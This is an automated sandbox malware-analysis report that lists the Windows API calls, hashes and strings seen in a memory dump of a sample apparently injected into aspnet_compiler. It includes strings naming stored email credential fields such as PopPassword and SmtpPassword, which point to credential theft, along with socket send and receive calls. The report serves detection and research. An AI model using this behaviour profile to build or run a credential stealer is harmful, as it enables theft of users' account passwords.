                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4241100979-0
                                                                                                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                                                  APIs
                                                                                                                  • CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CopyFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1304948518-0
                                                                                                                  • Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                                                                                  • Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
                                                                                                                  • Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                                                                                  • Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5
                                                                                                                  APIs
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1721193555-0
                                                                                                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                                                  APIs
                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2809346765-0
                                                                                                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                                                  APIs
                                                                                                                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileMove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3562171763-0
                                                                                                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Startup
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 724789610-0
                                                                                                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                                                  APIs
                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4033686569-0
                                                                                                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                                                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                                                  APIs
                                                                                                                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Close
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3535843008-0
                                                                                                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                                                  APIs
                                                                                                                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExistsFilePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1174141254-0
                                                                                                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                                                  APIs
                                                                                                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: recv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1507349165-0
                                                                                                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                                                  APIs
                                                                                                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: closesocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2781271927-0
                                                                                                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                                                  APIs
                                                                                                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1263568516-0
                                                                                                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                                                  APIs
                                                                                                                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                  • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                                                                                  • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                  • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                                                                                  APIs
                                                                                                                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                                                                                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1312198159-0
                                                                                                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                                  • API String ID: 0-2111798378
                                                                                                                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                                                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                                                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64